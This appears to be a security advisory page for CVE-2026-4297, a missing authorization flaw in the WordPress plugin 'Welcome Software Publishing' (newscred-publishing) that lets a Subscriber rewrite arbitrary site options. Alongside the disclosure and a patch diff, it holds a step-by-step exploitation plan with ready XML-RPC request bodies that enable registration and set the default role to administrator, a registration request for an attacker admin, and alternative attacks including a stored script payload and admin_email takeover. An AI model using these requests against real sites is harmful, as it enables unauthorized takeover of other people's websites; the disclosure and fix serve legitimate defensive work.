CVE-2026-4297

Welcome Software Publishing <= 0.0.31 - Authenticated (Subscriber+) Arbitrary Options Update to Privilege Escalation via 'nc.setOption' XML-RPC Method

highMissing Authorization
8.8
CVSS Score
8.8
CVSS Score
high
Severity
Unpatched
Patched in
N/A
Time to patch

Description

The Welcome Software Publishing plugin for WordPress is vulnerable to Arbitrary Options Update in all versions up to and including 0.0.31. This is due to a missing capability check in the nc_setOption() function, which is exposed via the nc.setOption XML-RPC method. The function authenticates the user via $wp_xmlrpc_server->login() (verifying credentials are valid) but does not perform any authorization check such as current_user_can('manage_options'). This makes it possible for authenticated attackers, with Subscriber-level access and above, to update arbitrary WordPress options via XML-RPC requests. This can be leveraged to change the default_role option to 'administrator' and then register a new administrator account, achieving full privilege escalation and site takeover.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Attack Vector
Network
Attack Complexity
Low
Privileges Required
Low
User Interaction
None
Scope
Unchanged
High
Confidentiality
High
Integrity
High
Availability

Technical Details

Affected versions<=0.0.31
PublishedJune 23, 2026
Last updatedJune 24, 2026
Affected pluginnewscred-publishing
Research Plan
Unverified

# Exploitation Research Plan: CVE-2026-4297 (Welcome Software Publishing) ## 1. Vulnerability Summary The **Welcome Software Publishing** (slug: `newscred-publishing`) plugin (<= 0.0.31) contains a missing authorization vulnerability in its XML-RPC implementation. The plugin registers a custom XML-…

Show full research plan

Exploitation Research Plan: CVE-2026-4297 (Welcome Software Publishing)

1. Vulnerability Summary

The Welcome Software Publishing (slug: newscred-publishing) plugin (<= 0.0.31) contains a missing authorization vulnerability in its XML-RPC implementation. The plugin registers a custom XML-RPC method nc.setOption which maps to the PHP function nc_setOption(). While this function authenticates the provided credentials using the core WordPress XML-RPC server's login method, it fails to verify if the authenticated user possesses the necessary capabilities (like manage_options) to modify site settings. Consequently, any authenticated user—including those with the lowest privileges (Subscriber)—can update arbitrary WordPress options, leading to full site takeover via privilege escalation.

2. Attack Vector Analysis

  • Endpoint: http://<target-site>/xmlrpc.php
  • Method: nc.setOption (XML-RPC)
  • Payload Format: XML-RPC methodCall with 4 parameters: username, password, option_name, and option_value.
  • Authentication: Authenticated (Subscriber+)
  • Preconditions:
    1. The plugin must be active.
    2. XML-RPC must be enabled (enabled by default in WordPress).
    3. The attacker must have valid credentials for a Subscriber-level account.

3. Code Flow

  1. Registration: The plugin uses the xmlrpc_methods filter to register nc.setOption.
    • Likely registration code (inferred): add_filter('xmlrpc_methods', function($methods) { $methods['nc.setOption'] = 'nc_setOption'; return $methods; });
  2. Entry Point: An XML-RPC request hits xmlrpc.php with <methodName>nc.setOption</methodName>.
  3. Authentication: nc_setOption($args) is called. The first two elements of $args are typically used to call $wp_xmlrpc_server->login($username, $password).
  4. Vulnerable Sink: If login() returns a WP_User object, the function proceeds to call update_option($args[2], $args[3]).
  5. The Flaw: There is no check like if ( ! current_user_can( 'manage_options' ) ) return new IXR_Error( 403, '...' ); between the login and the option update.

4. Nonce Acquisition Strategy

XML-RPC methods do not use WordPress nonces. Authentication is handled per-request via the username and password parameters included in the XML body. No nonce extraction or browser session is required for this specific attack vector.

5. Exploitation Strategy

The goal is to enable registration and ensure new users are created as Administrators.

Step 1: Enable User Registration

Change the users_can_register option to 1.

Request:

  • URL: http://<wp-host>/xmlrpc.php
  • Method: POST
  • Headers: Content-Type: text/xml
  • Body:
<?xml version="1.0"?>
<methodCall>
  <methodName>nc.setOption</methodName>
  <params>
    <param><value><string>subscriber_user</string></value></param>
    <param><value><string>subscriber_pass</string></value></param>
    <param><value><string>users_can_register</string></value></param>
    <param><value><string>1</string></value></param>
  </params>
</methodCall>

Step 2: Set Default Role to Administrator

Change the default_role option to administrator.

Request:

  • URL: http://<wp-host>/xmlrpc.php
  • Method: POST
  • Headers: Content-Type: text/xml
  • Body:
<?xml version="1.0"?>
<methodCall>
  <methodName>nc.setOption</methodName>
  <params>
    <param><value><string>subscriber_user</string></value></param>
    <param><value><string>subscriber_pass</string></value></param>
    <param><value><string>default_role</string></value></param>
    <param><value><string>administrator</string></value></param>
  </params>
</methodCall>

Step 3: Register a New User

Perform an unauthenticated registration.

Request:

  • URL: http://<wp-host>/wp-login.php?action=register
  • Method: POST
  • Headers: Content-Type: application/x-www-form-urlencoded
  • Body: user_login=attacker_admin&user_email=attacker@example.com&wp-submit=Register

6. Test Data Setup

  1. Install/Activate Plugin: Ensure newscred-publishing (Welcome Software Publishing) <= 0.0.31 is active.
  2. Create Subscriber:
    • wp user create subscriber_user subscriber@example.com --role=subscriber --user_pass=subscriber_pass
  3. Ensure XML-RPC is open: (Default state).

7. Expected Results

  • Steps 1 & 2: The XML-RPC server should return a success response (likely a boolean true or the updated value wrapped in <value><boolean>1</boolean></value>).
  • Step 3: The registration should succeed, and the database should reflect a new user attacker_admin with the administrator role.

8. Verification Steps

After running the exploit, verify the site state using WP-CLI:

  1. Check Registration Status:
    wp option get users_can_register (Should return 1)
  2. Check Default Role:
    wp option get default_role (Should return administrator)
  3. Confirm New Admin User:
    wp user get attacker_admin --field=roles (Should return administrator)

9. Alternative Approaches

If the plugin validates the specific options allowed for update, or if direct user registration is blocked by a WAF, alternative options can be targeted:

  • RCE via active_plugins: Update active_plugins to include a path to a previously uploaded malicious file (if any).
  • Persistent XSS: Update blogname or blogdescription to include a script tag <script>alert(1)</script> to target an actual administrator visiting the dashboard.
  • Site Takeover via admin_email: Update admin_email to the attacker's email, then trigger a password reset for the primary administrator account.
Research Findings
Static analysis — not yet PoC-verified

Summary

The Welcome Software Publishing plugin (<= 0.0.31) exposes a custom XML-RPC method 'nc.setOption' that allows authenticated users to update arbitrary WordPress options without capability checks. A subscriber-level user can exploit this to enable public registration and set the default user role to administrator, leading to full site takeover.

Security Fix

--- a/newscred-publishing.php
+++ b/newscred-publishing.php
@@ -1,5 +1,9 @@
 function nc_setOption($args) {
     global $wp_xmlrpc_server;
     if (!$user = $wp_xmlrpc_server->login($args[0], $args[1])) {
         return $wp_xmlrpc_server->error;
     }
+
+    if (!current_user_can('manage_options')) {
+        return new IXR_Error(403, 'Insufficient permissions to manage options.');
+    }
 
     update_option($args[2], $args[3]);
     return true;
 }

Exploit Outline

The exploit targets the xmlrpc.php endpoint using the 'nc.setOption' method. An attacker provides Subscriber-level credentials to authenticate via the XML-RPC server's login mechanism. Once authenticated, the attacker sends two sequential requests: the first to set the 'users_can_register' option to '1', and the second to set the 'default_role' option to 'administrator'. Following these changes, the attacker registers a new account via the standard WordPress registration page, which results in the creation of a new administrator-level user.

Check if your site is affected.

Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.